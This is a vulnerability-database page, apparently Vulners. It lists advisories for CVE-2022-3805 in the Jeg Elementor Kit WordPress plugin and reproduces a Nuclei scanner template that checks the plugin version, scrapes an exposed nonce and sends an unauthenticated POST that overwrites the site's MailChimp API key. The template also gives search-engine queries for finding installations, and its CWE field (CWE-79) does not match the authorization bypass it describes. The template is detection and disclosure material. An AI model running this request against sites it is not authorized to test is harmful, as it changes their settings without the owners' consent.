| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2022-3805 | 22 Dec 202221:15 | ā | attackerkb | |
| CVE-2022-3805 | 23 Dec 202200:14 | ā | circl | |
| WordPress plugin Jeg Elementor Kit å®å Øę¼ę“ | 22 Dec 202200:00 | ā | cnnvd | |
| CVE-2022-3805 | 22 Dec 202220:26 | ā | cve | |
| CVE-2022-3805 Jeg Elementor Kit <= 2.5.6 - Unauthenticated Authorization Bypass | 22 Dec 202220:26 | ā | cvelist | |
| EUVD-2022-43146 | 22 Dec 202220:26 | ā | euvd | |
| CVE-2022-3805 | 22 Dec 202221:15 | ā | nvd | |
| WordPress Jeg Elementor Kit Plugin < 2.5.7 is vulnerable to Broken Access Control | 3 Jan 202300:00 | ā | patchstack | |
| Authorization | 22 Dec 202221:15 | ā | prion | |
| PT-2022-24175 | 22 Dec 202200:00 | ā | ptsecurity |
id: CVE-2022-3805
info:
name: Jeg Elementor Kit < 2.5.7 - Unauthenticated Settings Update
author: DhiyaneshDk,popcorn94
severity: high
description: |
The Jeg Elementor Kit plugin for WordPress is vulnerable to authorization bypass in various functions used to update the plugin settings in versions up to, and including, 2.5.6. Unauthenticated users can use an easily available nonce, obtained from pages edited by the plugin, to update the MailChimp API key, global styles, 404 page settings, and enabled elements.
impact: |
Unauthenticated attackers can exploit authorization bypass using easily obtained nonces to update plugin settings including MailChimp API keys, global styles, and 404 page configurations, potentially compromising site integrations and design.
remediation: Fixed in 2.5.7
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-3805
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jeg-elementor-kit/jeg-elementor-kit-256-unauthenticated-authorization-bypass
- https://wordpress.org/plugins/jeg-elementor-kit/#developers
- https://www.wordfence.com/threat-intel/vulnerabilities/id/c9955d65-afb3-4d28-abd2-9f2fec92d013
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
cvss-score: 8.6
cve-id: CVE-2022-3805
cwe-id: CWE-79
epss-score: 0.01594
epss-percentile: 0.72757
cpe: cpe:2.3:a:jegtheme:jeg_elementor_kit:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: jegtheme
product: jeg_elementor_kit
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/jeg-elementor-kit"
fofa-query: body="/wp-content/plugins/jeg-elementor-kit/"
publicwww-query: "/wp-content/plugins/jeg-elementor-kit/"
tags: cve,cve2022,wordpress,wp,wp-plugin,jeg-elementor-kit,vkev,unauth,intrusive,vuln
variables:
rand: "{{rand_text_numeric(5)}}"
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET /wp-content/plugins/jeg-elementor-kit/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'compare_versions(version, "< 2.5.7")'
- 'contains(body, "Jeg Elementor Kit")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "jeg-elementor-kit")
- contains(content_type, "text/html")
condition: and
internal: true
extractors:
- type: regex
group: 1
name: nonce
regex:
- 'jkit_nonce = "([a-zA-Z0-9]{10})"'
internal: true
- type: regex
group: 1
name: url
regex:
- 'jkit_ajax_url = "(http[s]?://[^"]+)"'
internal: true
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
jkit-ajax-request=jkit_elements&form_data[mailchimp_api_key]={{rand}}&action=save_user_data&nonce={{nonce}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "Success Save Data")
- contains(content_type, "application/json")
condition: and
# digest: 4b0a004830460221008cdee686dd48180b50782de3174c9f89a3961e16c3438c090dae61efeb4b5ca0022100c51de05d6e668f10114002ed8a3d792cf6969b04e9b08647efc1f7da4059825d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation